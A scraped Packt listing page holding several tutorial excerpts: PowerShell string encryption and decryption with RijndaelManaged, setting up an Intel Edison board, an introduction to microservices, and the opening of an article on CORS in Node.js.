using RijndaelManaged encryption, you need to import the .NET System.Security Assembly into your script. Much like importing a module to provide additional cmdlets, using .NET assemblies provide an extension to a variety of classes you wouldn't normally have access to in PowerShell. Importing the assembly isn't persistent. This means you will need to import the assembly each time you want to use it in a PowerShell session, or each time you want to run the script. To load the .NET assembly, you can use the Add-Type cmdlet with the -AssemblyName parameter with the System.Security argument. Since the cmdlet doesn't actually output anything to the screen, you may choose to print to the screen successful importing of the assembly. To import the System.Security Assembly with display information, you can do the following: Write-host "Loading the .NET System.Security Assembly For Encryption" Add-Type -AssemblyNameSystem.Security -ErrorActionSilentlyContinue -ErrorVariable err if ($err) { Write-host "Error Importing the .NET System.Security Assembly." PAUSE EXIT } # if err is not set, it was successful. if (!$err) { Write-host "Succesfully loaded the .NET System.Security Assembly For Encryption" } The output from this command looks like the following: In this example, you successfully import the.NET System.SecurityAssembly for use with PowerShell. You first start by writing "Loading the .NET System.Security Assembly for Encryption" to the screen using the Write-host command. You then leverage the Add-Type cmdlet with the -AssemblyName parameter with the System.Security argument, the -ErrorAction parameter with the SilentlyContinue argument, and the -ErrorVariable parameter with the err argument. You then create an if statement to see if $err contains data. If it does, it will use Write-host cmdlet to print"Error Importing the .NET System.Security Assembly." to the screen. It will PAUSE the script so the error can be read. Finally, it will exit the script. If $err is $null, designated by if (!$err) {, it will use the Write-host cmdlet to print "Successfully loaded the .NET System.Security Assembly for Encryption" to the screen. At this point, the script or PowerShell window is ready to leverageSystem.Security Assembly. After you loadSystem.Security Assembly, you can start creating the encryption function. The RijndaelManaged encryption requires a four-step process to encrypt the strings which is represented in the preceeding diagram. The RijndaelManaged encryption process is as follows: The process starts by creating the encryptor. The encryptor is derived from the encryption key (password and salt) and initialization vector. After you define the encryptor, you will need to create a new memory stream using the IO.MemoryStream object. A memory stream is what stores values in memory for use by the encryption assembly. Once the memory stream is open, you define a System.Security.Cryptography.CryptoStream object. The CryptoStream is the mechanism that uses the memory stream and the encryptor to transform the unencrypted data to encrypted data. In order to leverage the CryptoStream, you need to write data to the CryptoStream. The final step is to use the IO.StreamWriter object to write the unencrypted value into the CryptoStream. The output from this transformation is placed into MemoryStream. To access the encrypted value, you read the data in the memory stream. To learn more about the System.Security.Cryptography.RijndaelManaged class, you can view the following MSDN article: https://msdn.microsoft.com/en-us/library/system.security.cryptography.rijndaelmanaged(v=vs.110).aspx. To create a script that encrypts strings using the RijndaelManaged encryption, you would perform the following: Add-Type -AssemblyNameSystem.Security function Encrypt-String { param($String, $Pass, $salt="CreateAUniqueSalt", $init="CreateAUniqueInit") try{ $r = new-Object System.Security.Cryptography.RijndaelManaged $pass = [Text.Encoding]::UTF8.GetBytes($pass) $salt = [Text.Encoding]::UTF8.GetBytes($salt) $init = [Text.Encoding]::UTF8.GetBytes($init) $r.Key = (new-Object Security.Cryptography.PasswordDeriveBytes $pass, $salt, "SHA1", 50000).GetBytes(32) $r.IV = (new-Object Security.Cryptography.SHA1Managed).ComputeHash($init)[0..15] $c = $r.CreateEncryptor() $ms = new-Object IO.MemoryStream $cs = new-Object Security.Cryptography.CryptoStream $ms,$c,"Write" $sw = new-Object IO.StreamWriter $cs $sw.Write($String) $sw.Close() $cs.Close() $ms.Close() $r.Clear() [byte[]]$result = $ms.ToArray() } catch { $err = "Error Occurred Encrypting String: $_" } if($err) { # Report Back Error return $err } else { return [Convert]::ToBase64String($result) } } Encrypt-String "Encrypt This String""A_Complex_Password_With_A_Lot_Of_Characters" The output of this script would look like the following: This function displays how to encrypt a string leveraging the RijndaelManaged encryption algorithm. You first start by importing the System.Security assembly by leveraging Add-Type cmdlet, using the -AssemblyName parameter with the System.Security argument. You then declare the function of Encrypt-String. You include a parameter block to accept and set values into the function. The first value is $string, which is the unencrypted text. The second value is $pass, which is used for the encryption key. The third is a predefined $salt variable set to "CreateAUniqueSalt". You then define the $init variable, which is set to "CreateAUniqueInit". After the parameter block, you declare try { to handle any errors in the .NET assembly. The first step is to declare the encryption class using new-Object cmdlet with the System.Security.Cryptography.RijndaelManaged argument. You place this object inside the $r variable. You then convert the $pass, $salt, and $init values to the character encoding standard of UTF8 and store the character byte values in a variable. This is done specifying [Text.Encoding]::UTF8.GetBytes($pass) for the $pass variable, [Text.Encoding]::UTF8.GetBytes($salt) for the $salt variable, and [Text.Encoding]::UTF8.GetBytes($init) for the $init variable. After setting the proper character encoding, you proceed to create the encryption key for the RijndalManaged encryption algorithm. This is done by setting the RijndaelManaged $r.Key attribute to the object created by (new-Object Security.Cryptography.PasswordDeriveBytes $pass, $salt, "SHA1", 50000).GetBytes(32). This object leverages the Security.Cryptography.PasswordDeriveBytes class and creates a key using the $pass variable, $salt variable, "SHA1" hash name, and iterating the derivative 50000 times. Each iteration of this class generates a different key value, making it more complex to guess the key. You then leverage the .Get-Bytes(32) method to return the 32-byte value of the key. The RijndaelManaged 256-bit encryption is a derivative of the 32 bytes in the key. 32 bytes times 8 bits per byte is 256bits. To create the initialization vector for the algorithm, you set the RijndaelManaged$r.IV attribute to the object created by (new-Object Security.Cryptography.SHA1Managed).ComputeHash($init)[0..15]. This section of the code leverages Security.Cryptography.SHA1Managed and computes the hash based on the $init value. When you invoke the [0..15] range operator, it will obtain the first 16 bytes of the hash and place it into $r.IVattribute. The RijndaelManaged default block size for the initialization vector is 128bits. 16 bytes times 8 bits per byte is 128bits. After setting up the required attributes, you are now ready to start encrypting data. You first start by leveraging the $r RijndaelManaged object with the $r.Key and $r.IV attributes defined. You use the $r.CreateEncryptor() method to generate the encryptor. Once you've generated the encryptor, you have to create a memory stream to do the encryption in memory. This is done by declaring new-Objectcmdlet, set to the IO.MemoryStream class, and placing the memory stream object in the $ms variable. Next, you create CryptoStream. The CryptoStream is used to transform the unencrypted data into the encrypted data. You first declare the new-Object cmdlet with the Security.Cryptopgraphy.CryptoStream argument. You also define the memory stream of $ms, the encryptor of $c, and the operator of "Write" to tell the class to write unencrypted data to the encryption stream in memory. After creating CryptoStream, you are ready to write the unencrypted data into the CryptoStream. This is done using the IO.StreamWriter class. You declare a new-Object cmdlet with the IO.StreamWriter argument, and define CryptoStream of $cs for writing. Last, you take the unencrypted string stored in the $string variable, and pass it into the StreamWriter$sw with $sw.Write($String). The encrypted value is now stored in the memory stream. To stop the writing of data to the CryptoStream and MemoryStream, you close the StreamWriter with $sw.Close(), close the CryptoStream with $cs.Close() and the memory stream with $ms.Close(). For security purposes, you also clear out the encryptor data by declaring $r.Clear(). After the encryption process is done, you will need to export the memory stream to a byte array. This is done calling the $ms.ToArray() method and setting it to the$result variable with the [byte[]] data type. The contents are stored in a byte array in $result. This section of the code is where you declare your catch { statement. If there were any errors in the encryption process, the script will execute this section. You declare the variable of $err with the"Error Occurred Encrypting String: $_" argument. The $_ will be the pipeline error that occurred during the try {} section. You then create an if statement to determine whether there is data in the $err variable. If there is data in $err, it returns the error string to the script. If there were no errors, the script will enter the else { section of the script. It will convert the $result byte array to Base64String by leveraging [Convert]::ToBase64String($result). This converts the byte array to string for use in your scripts. After defining the encryption function, you call the function for use. You first start by calling Encrypt-String followed by "Encrypt This String". You also declare the second argument as the password for the encryptor, which is "A_Complex_Password_With_A_Lot_Of_Characters". After execution, this example receives the encrypted value of hK7GHaDD1FxknHu03TYAPxbFAAZeJ6KTSHlnSCPpJ7c= generated from the function. Your results will vary depending on your salt, init, and password you use for the encryption algorithm. Decrypting strings The decryption of strings is very similar to the process you performed of encrypting strings. Instead of writing data to the memory stream, the function reads the data in the memory stream. Also, instead of using the .CreateEncryptor() method, the decryption process leverages the .CreateDecryptor() method. To create a script that decrypts encrypted strings using the RijndaelManaged encryption, you would perform the following: Add-Type -AssemblyNameSystem.Security function Decrypt-String { param($Encrypted, $pass, $salt="CreateAUniqueSalt", $init="CreateAUniqueInit") if($Encrypted -is [string]){ $Encrypted = [Convert]::FromBase64String($Encrypted) } $r = new-Object System.Security.Cryptography.RijndaelManaged $pass = [System.Text.Encoding]::UTF8.GetBytes($pass) $salt = [System.Text.Encoding]::UTF8.GetBytes($salt) $init = [Text.Encoding]::UTF8.GetBytes($init) $r.Key = (new-Object Security.Cryptography.PasswordDeriveBytes $pass, $salt, "SHA1", 50000).GetBytes(32) $r.IV = (new-Object Security.Cryptography.SHA1Managed).ComputeHash($init)[0..15] $d = $r.CreateDecryptor() $ms = new-Object IO.MemoryStream@(,$Encrypted) $cs = new-Object Security.Cryptography.CryptoStream $ms,$d,"Read" $sr = new-Object IO.StreamReader $cs try { $result = $sr.ReadToEnd() $sr.Close() $cs.Close() $ms.Close() $r.Clear() Return $result } Catch { Write-host "Error Occurred Decrypting String: Wrong String Used In Script." } } Decrypt-String "hK7GHaDD1FxknHu03TYAPxbFAAZeJ6KTSHlnSCPpJ7c=""A_Complex_Password_With_A_Lot_Of_Characters". The output of this script would look like the following: This function displays how to decrypt a string leveraging the RijndaelManaged encryption algorithm. You first start by importing the System.Security assembly by leveraging the Add-Type cmdlet, using the -AssemblyName parameter with the System.Security argument. You then declare the Decrypt-String function. You include a parameter block to accept and set values for the function. The first value is $Encrypted, which is the encrypted text. The second value is the $pass which is used for the encryption key. The third is a predefined $salt variable set to "CreateAUniqueSalt". You then define the $init variable, which is set to "CreateAUniqueInit". After the parameter block, you check to see if the encrypted value is formatted as a string by using if ($Encrypted -is [string]) {. If this evaluates to True, you convert the string to bytes using [Convert]::FromBase64String($Encrypted) and placing the encoded value in the $Encrypted variable. Next, you declare the decryption class using new-Object cmdlet with the System.Security.Cryptography.RijndaelManaged argument. You place this object inside of the $r variable. You then convert the $pass, $salt, and $init values to the character encoding standard of UTF8 and store the character byte values in a variable. This is done specifying [Text.Encoding]::UTF8.GetBytes($pass) for the $pass variable, [Text.Encoding]::UTF8.GetBytes($salt) for the $salt variable, and [Text.Encoding]::UTF8.GetBytes($init) for the $init variable. After setting the proper character encoding, you proceed to create the encryption key for the RijndaelManaged encryption algorithm. This is done by setting the RijndaelManaged $r.Key attribute to the object created by (new-Object Security.Cryptography.PasswordDeriveBytes $pass, $salt, "SHA1", 50000).GetBytes(32). This object leverages the Security.Cryptography.PasswordDeriveBytes class and creates a key using the $pass variable, $salt variable, "SHA1" hash name, and iterating the derivative 50000 times. Each iteration of this class generates a different key value, making it more complex to guess the key. You then leverage the .get-bytes(32) method to return the 32-byte value of the key. To create the initialization vector for the algorithm, you set the RijndaelManaged $r.IV attribute to the object created by (new-Object Security.Cryptography.SHA1Managed).ComputeHash($init)[0..15]. This section of the code leverages the Security.Cryptography.SHA1Managed class and computes the hash based on the $init value. When you invoke the [0..15] range operator, the first 16 bytes of the hash are obtained and placed into $r.IV attribute. After setting up the required attributes, you are now ready to start decrypting data. You first start by leveraging the $r RijndaelManaged object with the $r.key and $r.IV attributes defined. You use the $r.CreateDecryptor() method to generate the decryptor. Once you've generated the decryptor, you have to create a memory stream to do the decryption in memory. This is done by declaring new-Object cmdlet with the IO.MemoryStream class argument. You then reference the $encrypted values to place in the memory stream object with @(,$Encrypted), and store the populated memory stream in the $ms variable. Next, you create CryptoStream, which CryptoStream is used to transform the encrypted data into the decrypted data. You first declare new-Object cmdlet with the Security.Cryptopgraphy.CryptoStream class argument. You also define the memory stream of $ms, the decryptor of $d, and the operator of "Read" to tell the class to read the encrypted data from the encryption stream in memory. After creating CryptoStream, you are ready to read the decrypted datafrom CryptoStream. This is done using the IO.StreamReader class. You declare new-Object with the IO.StreamReader class argument, and define CryptoStream of $cs to read from. At this point, you use try { to catch any error messages that are generated from reading the data in the StreamReader. You call $sr.ReadToEnd(), which calls the StreamReader and reads the complete decrypted value and places the datain the $result variable. To stop the reading of data to CryptoStream and MemoryStream, you close StreamWriter with $sw.Close(), close the CryptoStream with $cs.Close() and the memory stream with $ms.Close(). For security purposes, you also clear out the decryptor data by declaring $r.Clear(). If the decryption is successful, you return the value of $result to the script. After defining the decryption function, you call the function for use. You first start by calling Decrypt-String followed by "hK7GHaDD1FxknHu03TYAPxbFAAZeJ6KTSHlnSCPpJ7c=". You also declare the second argument as the password for the decryptor, which is "A_Complex_Password_With_A_Lot_Of_Characters". After execution, you will receive the decrypted value of "Encrypt This String" generated from the function. Summary In this article, we learned about RijndaelManaged 256-bit encryption. We first started with the basics of the encryption process. Then, we proceeded into learning how to create randomized salt, init, and passwords in scripts. We ended the article with learning how to encrypt and decrypt strings. Resources for Article: Further resources on this subject: WLAN Encryption Flaws [article] Introducing PowerShell Remoting [article] SQL Server with PowerShell [article]
Read more
  • 0
  • 0
  • 13052
article-image-setting-intel-edison
Packt
21 Jun 2017
8 min read
Save for later

Setting up Intel Edison

Packt
21 Jun 2017
8 min read
In this article by Avirup Basu, the author of the book Intel Edison Projects, we will be covering the following topics: Setting up the Intel Edison Setting up the developer environment (For more resources related to this topic, see here.) In every Internet of Things(IoT) or robotics project, we have a controller that is the brain of the entire system. Similarly we have Intel Edison. The Intel Edison computing module comes in two different packages. One of which is a mini breakout board the other of which is an Arduino compatible board. One can use the board in its native state as well but in that case the person has to fabricate his/hers own expansion board. The Edison is basically a size of a SD card. Due to its tiny size, it's perfect for wearable devices. However it's capabilities makes it suitable for IoT application and above all, the powerful processing capability makes it suitable for robotics application. However we don't simply use the device in this state. We hook up the board with an expansion board. The expansion board provides the user with enough flexibility and compatibility for interfacing with other units. The Edison has an operating system that is running the entire system. It runs a Linux image. Thus, to setup your device, you initially need to configure your device both at the hardware and at software level. Initial hardware setup We'll concentrate on the Edison package that comes with an Arduino expansion board. Initially you will get two different pieces: The Intel® Edison board The Arduino expansion board The following given is the architecture of the device: Architecture of Intel Edison. Picture Credits: https://software.intel.com/en-us/ We need to hook these two pieces up in a single unit. Place the Edison board on top of the expansion board such that the GPIO interfaces meet at a single point. Gently push the Edison against the expansion board. You will get a click sound. Use the screws that comes with the package to tighten the set up. Once, this is done, we'll now setup the device both at hardware level and software level to be used further. Following are the steps we'll cover in details: Downloading necessary software packages Connecting your Intel® Edison to your PC Flashing your device with the Linux image Connecting to a Wi-Fi network SSH-ing your Intel® Edison device Downloading necessary software packages To move forward with the development on this platform, we need to download and install a couple of software which includes the drivers and the IDEs. Following is the list of the software along with the links that are required: Intel® Platform Flash Tool Lite (https://01.org/android-ia/downloads/intel-platform-flash-tool-lite) PuTTY (http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html) Intel XDK for IoT (https://software.intel.com/en-us/intel-xdk) Arduino IDE (https://www.arduino.cc/en/Main/Software) FileZilla FTP client (https://filezilla-project.org/download.php) Notepad ++ or any other editor (https://notepad-plus-plus.org/download/v7.3.html) Drivers and miscellaneous downloads Latest Yocto* Poky image Windows standalone driver for Intel Edison FTDI drivers (http://www.ftdichip.com/Drivers/VCP.htm) The 1st and the 2nd packages can be downloaded from (https://software.intel.com/en-us/iot/hardware/edison/downloads) Plugging in your device After all the software and drivers installation, we'll now connect the device to a PC. You need two Micro-B USB Cables(s) to connect your device to the PC. You can also use a 9V power adapter and a single Micro-B USB Cable, but for now we will not use the power adapter: Different sections of Arduino expansion board of Intel Edison A small switch exists between the USB port and the OTG port. This switch must be towards the OTG port because we're going to power the device from the OTG port and not through the DC power port. Once it is connected to your PC, open your device manager and expands the ports section. If all installations of drivers were successful, then you must see two ports: Intel Edison virtual com port USB serial port Flashing your device Once your device is successfully detected an installed, you need to flash your device with the Linux image. For this we'll use the flash tool provided by Intel: Open the flash lite tool and connect your device to the PC: Intel phone flash lite tool Once the flash tool is opened, click on Browse... and browse to the .zip file of the Linux image you have downloaded. After you click on OK, the tool will automatically unzip the file. Next, click on Start to flash: Intel® Phone flash lite tool – stage 1 You will be asked to disconnect and reconnect your device. Do as the tool says and the board should start flashing. It may take some time before the flashing is completed. You are requested not to tamper with the device during the process. Once the flashing is completed, we'll now configure the device: Intel® Phone flash lite tool – complete Configuring the device After flashing is successfully we'll now configure the device. We're going to use the PuTTY console for the configuration. PuTTY is an SSH and telnet client, developed originally by Simon Tatham for the Windows platform. We're going to use the serial section here. Before opening PuTTY console: Open up the device manager and note the port number for USB serial port. This will be used in your PuTTY console: Ports for Intel® Edison in PuTTY Next select Serialon PuTTY console and enter the port number. Use a baud rate of 115200. Press Open to open the window for communicating with the device: PuTTY console – login screen Once you are in the console of PuTTY, then you can execute commands to configure your Edison. Following is the set of tasks we'll do in the console to configure the device: Provide your device a name Provide root password (SSH your device) Connect your device to Wi-Fi Initially when in the console, you will be asked to login. Type in root and press Enter. Once entered you will see root@edison which means that you are in the root directory: PuTTY console – login success Now, we are in the Linux Terminal of the device. Firstly, we'll enter the following command for setup: configure_edison –setup Press Enter after entering the command and the entire configuration will be somewhat straightforward: PuTTY console – set password Firstly, you will be asked to set a password. Type in a password and press Enter. You need to type in your password again for confirmation. Next, we'll set up a name for the device: PuTTY console – set name Give a name for your device. Please note that this is not the login name for your device. It's just an alias for your device. Also the name should be at-least 5 characters long. Once you entered the name, it will ask for confirmation press y to confirm. Then it will ask you to setup Wi-Fi. Again select y to continue. It's not mandatory to setup Wi-Fi, but it's recommended. We need the Wi-Fi for file transfer, downloading packages, and so on: PuTTY console – set Wi-Fi Once the scanning is completed, we'll get a list of available networks. Select the number corresponding to your network and press Enter. In this case it 5 which corresponds to avirup171which is my Wi-Fi. Enter the network credentials. After you do that, your device will get connected to the Wi-Fi. You should get an IP after your device is connected: PuTTY console – set Wi-Fi -2 After successful connection you should get this screen. Make sure your PC is connected to the same network. Open up the browser in your PC, and enter the IP address as mentioned in the console. You should get a screen similar to this: Wi-Fi setup – completed Now, we are done with the initial setup. However Wi-Fi setup normally doesn't happens in one go. Sometimes your device doesn't gets connected to the Wi-Fi and sometimes we cannot get this page as shown before. In those cases you need to start wpa_cli to manually configure the Wi-Fi. Refer to the following link for the details: http://www.intel.com/content/www/us/en/support/boards-and-kits/000006202.html Summary In this article, we have covered the areas of initial setup of Intel Edison and configuring it to the network. We have also covered how to transfer files to the Edison and vice versa. Resources for Article: Further resources on this subject: Getting Started with Intel Galileo [article] Creating Basic Artificial Intelligence [article] Using IntelliTrace to Diagnose Problems with a Hosted Service [article]
Read more
  • 0
  • 0
  • 26088

article-image-what-are-microservices
Packt
20 Jun 2017
12 min read
Save for later

What are Microservices?

Packt
20 Jun 2017
12 min read
In this article written by Gaurav Kumar Aroraa, Lalit Kale, Kanwar Manish, authors of the book Building Microservices with .NET Core, we will start with a brief introduction. Then, we will define its predecessors: monolithic architecture and service-oriented architecture (SOA). After this, we will see how microservices fare against both SOA and the monolithic architecture. We will then compare the advantages and disadvantages of each one of these architectural styles. This will enable us to identify the right scenario for these styles. We will understand the problems that arise from having a layered monolithic architecture. We will discuss the solutions available to these problems in the monolithic world. At the end, we will be able to break down a monolithic application into a microservice architecture. We will cover the following topics in this article: Origin of microservices Discussing microservices (For more resources related to this topic, see here.) Origin of microservices The term microservices was used for the first time in mid-2011 at a workshop of software architects. In March 2012, James Lewis presented some of his ideas about microservices. By the end of 2013, various groups from the IT industry started having discussions on microservices, and by 2014, it had become popular enough to be considered a serious contender for large enterprises. There is no official introduction available for microservices. The understanding of the term is purely based on the use cases and discussions held in the past. We will discuss this in detail, but before that, let's check out the definition of microservices as per Wikipedia (https://en.wikipedia.org/wiki/Microservices), which sums it up as: Microservices is a specialization of and implementation approach for SOA used to build flexible, independently deployable software systems. In 2014, James Lewis and Martin Fowler came together and provided a few real-world examples and presented microservices (refer to http://martinfowler.com/microservices/) in their own words and further detailed it as follows: The microservice architectural style is an approach to developing a single application as a suite of small services, each running in its own process and communicating with lightweight mechanisms, often an HTTP resource API. These services are built around business capabilities and independently deployable by fully automated deployment machinery. There is a bare minimum of centralized management of these services, which may be written in different programming languages and use different data storage technologies. It is very important that you see all the attributes James and Martin defined here. They defined it as an architectural style that developers could utilize to develop a single application with the business logic spread across a bunch of small services, each having their own persistent storage functionality. Also, note its attributes: it can be independently deployable, can run in its own process, is a lightweight communication mechanism, and can be written in different programming languages. We want to emphasize this specific definition since it is the crux of the whole concept. And as we move along, it will come together by the time we finish this book. Discussing microservices Until now, we have gone through a few definitions of microservices; now, let's discuss microservices in detail. In short, a microservice architecture removes most of the drawbacks of SOA architectures.  Slicing your application into a number of services is neither SOA nor microservices. However, combining service design and best practices from the SOA world along with a few emerging practices, such as isolated deployment, semantic versioning, providing lightweight services, and service discovery in polyglot programming, is microservices. We implement microservices to satisfy business features and implement them with reduced time to market and greater flexibility. Before we move on to understand the architecture, let's discuss the two important architectures that have led to its existence: The monolithic architecture style SOA Most of us would be aware of the scenario where during the life cycle of an enterprise application development, a suitable architectural style is decided. Then, at various stages, the initial pattern is further improved and adapted with changes that cater to various challenges, such as deployment complexity, large code base, and scalability issues. This is exactly how the monolithic architecture style evolved into SOA, further leading up to microservices. Monolithic architecture The monolithic architectural style is a traditional architecture type and has been widely used in the industry. The term "monolithic" is not new and is borrowed from the Unix world. In Unix, most of the commands exist as a standalone program whose functionality is not dependent on any other program. As seen in the succeeding image, we can have different components in the application such as: User interface: This handles all of the user interaction while responding with HTML or JSON or any other preferred data interchange format (in the case of web services). Business logic: All the business rules applied to the input being received in the form of user input, events, and database exist here. Database access: This houses the complete functionality for accessing the database for the purpose of querying and persisting objects. A widely accepted rule is that it is utilized through business modules and never directly through user-facing components. Software built using this architecture is self-contained. We can imagine a single .NET assembly that contains various components, as described in the following image: As the software is self-contained here, its components are interconnected and interdependent. Even a simple code change in one of the modules may break a major functionality in other modules. This would result in a scenario where we'd need to test the whole application. With the business depending critically on its enterprise application frameworks, this amount of time could prove to be very critical. Having all the components tightly coupled poses another challenge: whenever we execute or compile such software, all the components should be available or the build will fail; refer to the preceding image that represents a monolithic architecture and is a self-contained or a single .NET assembly project. However, monolithic architectures might also have multiple assemblies. This means that even though a business layer (assembly, data access layer assembly, and so on) is separated, at run time, all of them will come together and run as one process.  A user interface depends on other components' direct sale and inventory in a manner similar to all other components that depend upon each other. In this scenario, we will not be able to execute this project in the absence of any one of these components. The process of upgrading any one of these components will be more complex as we may have to consider other components that require code changes too. This results in more development time than required for the actual change. Deploying such an application will become another challenge. During deployment, we will have to make sure that each and every component is deployed properly; otherwise, we may end up facing a lot of issues in our production environments. If we develop an application using the monolithic architecture style, as discussed previously, we might face the following challenges: Large code base: This is a scenario where the code lines outnumber the comments by a great margin. As components are interconnected, we will have to bear with a repetitive code base. Too many business modules: This is in regard to modules within the same system. Code base complexity: This results in a higher chance of code breaking due to the fix required in other modules or services. Complex code deployment: You may come across minor changes that would require whole system deployment. One module failure affecting the whole system: This is in regard to modules that depend on each other. Scalability: This is required for the entire system and not just the modules in it. Intermodule dependency: This is due to tight coupling. Spiraling development time: This is due to code complexity and interdependency. Inability to easily adapt to a new technology: In this case, the entire system would need to be upgraded. As discussed earlier, if we want to reduce development time, ease of deployment, and improve maintainability of software for enterprise applications, we should avoid the traditional or monolithic architecture. Service-oriented architecture In the previous section, we discussed the monolithic architecture and its limitations. We also discussed why it does not fit into our enterprise application requirements. To overcome these issues, we should go with some modular approach where we can separate the components such that they should come out of the self-contained or single .NET assembly. The main difference between SOA & monolithic is not one or multiple assembly. But as the service in SOA runs as separate process, SOA scales better compared to monolithic. Let's discuss the modular architecture, that is, SOA. This is a famous architectural style using which the enterprise applications are designed with a collection of services as its base. These services may be RESTful or ASMX Web services. To understand SOA in more detail, let's discuss "service" first. What is service? Service, in this case, is an essential concept of SOA. It can be a piece of code, program, or software that provides some functionality to other system components. This piece of code can interact directly with the database or indirectly through another service. Furthermore, it can be consumed by clients directly, where the client may either be a website, desktop app, mobile app, or any other device app. Refer to the following diagram: Service refers to a type of functionality exposed for consumption by other systems (generally referred to as clients/client applications). As mentioned earlier, it can be represented by a piece of code, program, or software. Such services are exposed over the HTTP transport protocol as a general practice. However, the HTTP protocol is not a limiting factor, and a protocol can be picked as deemed fit for the scenario. In the following image, Service – direct selling is directly interacting with Database, and three different clients, namely Web, Desktop, and Mobile, are consuming the service. On the other hand, we have clients consuming Service – partner selling, which is interacting with Service – channel partners for database access. A product selling service is a set of services that interacts with client applications and provides database access directly or through another service, in this case, Service – Channel partner.  In the case of Service – direct selling, shown in the preceding example, it is providing some functionality to a Web Store, a desktop application, and a mobile application. This service is further interacting with the database for various tasks, namely fetching data, persisting data, and so on. Normally, services interact with other systems via some communication channel, generally the HTTP protocol. These services may or may not be deployed on the same or single servers. In the preceding image, we have projected an SOA example scenario. There are many fine points to note here, so let's get started. Firstly, our services can be spread across different physical machines. Here, Service-direct selling is hosted on two separate machines. It is a possible scenario that instead of the entire business functionality, only a part of it will reside on Server 1 and the remaining on Server 2. Similarly, Service – partner selling appears to be having the same arrangement on Server 3 and Server 4. However, it doesn't stop Service – channel partners being hosted as a complete set on both the servers: Server 5 and Server 6. A system that uses a service or multiple services in a fashion mentioned in the preceding figure is called an SOA. We will discuss SOA in detail in the following sections. Let's recall the monolithic architecture. In this case, we did not use it because it restricts code reusability; it is a self-contained assembly, and all the components are interconnected and interdependent. For deployment, in this case, we will have to deploy our complete project after we select the SOA (refer to preceding image and subsequent discussion). Now, because of the use of this architectural style, we have the benefit of code reusability and easy deployment. Let's examine this in the wake of the preceding figure: Reusability: Multiple clients can consume the service. The service can also be simultaneously consumed by other services. For example, OrderService is consumed by web and mobile clients. Now, OrderService can also be used by the Reporting Dashboard UI. Stateless: Services do not persist any state between requests from the client, that is, the service doesn't know, nor care, that the subsequent request has come from the client that has/hasn't made the previous request. Contract-based: Interfaces make it technology-agnostic on both sides of implementation and consumption. It also serves to make it immune to the code updates in the underlying functionality. Scalability: A system can be scaled up; SOA can be individually clustered with appropriate load balancing. Upgradation: It is very easy to roll out new functionalities or introduce new versions of the existing functionality. The system doesn't stop you from keeping multiple versions of the same business functionality. Summary In this article, we discussed what the microservice architectural style is in detail, its history, and how it differs from its predecessors: monolithic and SOA. We further defined the various challenges that monolithic faces when dealing with large systems. Scalability and reusability are some definite advantages that SOA provides over monolithic. We also discussed the limitations of the monolithic architecture, including scaling problems, by implementing a real-life monolithic application. The microservice architecture style resolves all these issues by reducing code interdependency and isolating the dataset size that any one of the microservices works upon. We utilized dependency injection and database refactoring for this. We further explored automation, CI, and deployment. These easily allow the development team to let the business sponsor choose what industry trends to respond to first. This results in cost benefits, better business response, timely technology adoption, effective scaling, and removal of human dependency. Resources for Article: Further resources on this subject: Microservices and Service Oriented Architecture [article] Breaking into Microservices Architecture [article] Microservices – Brave New World [article]
Read more
  • 0
  • 0
  • 30666

article-image-cors-nodejs
Packt
20 Jun 2017
14 min read
Save for later

CORS in Node.js

Packt
20 Jun 2017
14 min read
In this article by Randall Goya, and Rajesh Gunasundaram the author of the book CORS Essentials, Node.js is a cross-platform JavaScript runtime environment that executes JavaScript code at server side. This enables to have a unified language across the web application development. JavaScript becomes the unified language that runs both on client side and server side. (For more resources related to this topic, see here.) In this article we will learn about: Node.js is a JavaScript platform for developing server-side web applications. Node.js can provide the web server for other frameworks including Express.js, AngularJS, Backbone,js, Ember.js and others. Some other JavaScript frameworks such as ReactJS, Ember.js and Socket.IO may also use Node.js as the web server. Isomorphic JavaScript can add server-side functionality for client-side frameworks. JavaScript frameworks are evolving rapidly. This article reviews some of the current techniques, and syntax specific for some frameworks. Make sure to check the documentation for the project to discover the latest techniques. Understanding CORS concepts, you may create your own solution, because JavaScript is a loosely structured language. All the examples are based on the fundamentals of CORS, with allowed origin(s), methods, and headers such as Content-Type, or preflight, that may be required according to the CORS specification. JavaScript frameworks are very popular JavaScript is sometimes called the lingua franca of the Internet, because it is cross-platform and supported by many devices. It is also a loosely-structured language, which makes it possible to craft solutions for many types of applications. Sometimes an entire application is built in JavaScript. Frequently JavaScript provides a client-side front-end for applications built with Symfony, Content Management Systems such as Drupal, and other back-end frameworks. Node.js is server-side JavaScript and provides a web server as an alternative to Apache, IIS, Nginx and other traditional web servers. Introduction to Node.js Node.js is an open-source and cross-platform library that enables in developing server-side web applications. Applications will be written using JavaScript in Node.js can run on many operating systems, including OS X, Microsoft Windows, Linux, and many others. Node.js provides a non-blocking I/O and an event-driven architecture designed to optimize an application's performance and scalability for real-time web applications. The biggest difference between PHP and Node.js is that PHP is a blocking language, where commands execute only after the previous command has completed, while Node.js is a non-blocking language where commands execute in parallel, and use callbacks to signal completion. Node.js can move files, payloads from services, and data asynchronously, without waiting for some command to complete, which improves performance. Most JS frameworks that work with Node.js use the concept of routes to manage pages and other parts of the application. Each route may have its own set of configurations. For example, CORS may be enabled only for a specific page or route. Node.js loads modules for extending functionality via the npm package manager. The developer selects which packages to load with npm, which reduces bloat. The developer community creates a large number of npm packages created for specific functions. JXcore is a fork of Node.js targeting mobile devices and IoTs (Internet of Things devices). JXcore can use both Google V8 and Mozilla SpiderMonkey as its JavaScript engine. JXcore can run Node applications on iOS devices using Mozilla SpiderMonkey. MEAN is a popular JavaScript software stack with MongoDB (a NoSQL database), Express.js and AngularJS, all of which run on a Node.js server. JavaScript frameworks that work with Node.js Node.js provides a server for other popular JS frameworks, including AngularJS, Express.js. Backbone.js, Socket.IO, and Connect.js. ReactJS was designed to run in the client browser, but it is often combined with a Node.js server. As we shall see in the following descriptions, these frameworks are not necessarily exclusive, and are often combined in applications. Express.js is a Node.js server framework Express.js is a Node.js web application server framework, designed for building single-page, multi-page, and hybrid web applications. It is considered the "standard" server framework for Node.js. The package is installed with the command npm install express –save. AngularJS extends static HTML with dynamic views HTML was designed for static content, not for dynamic views. AngularJS extends HTML syntax with custom tag attributes. It provides model–view–controller (MVC) and model–view–viewmodel (MVVM) architectures in a front-end client-side framework.  AngularJS is often combined with a Node.js server and other JS frameworks. AngularJS runs client-side and Express.js runs on the server, therefore Express.js is considered more secure for functions such as validating user input, which can be tampered client-side. AngularJS applications can use the Express.js framework to connect to databases, for example in the MEAN stack. Connect.js provides middleware for Node.js requests Connect.js is a JavaScript framework providing middleware to handle requests in Node.js applications. 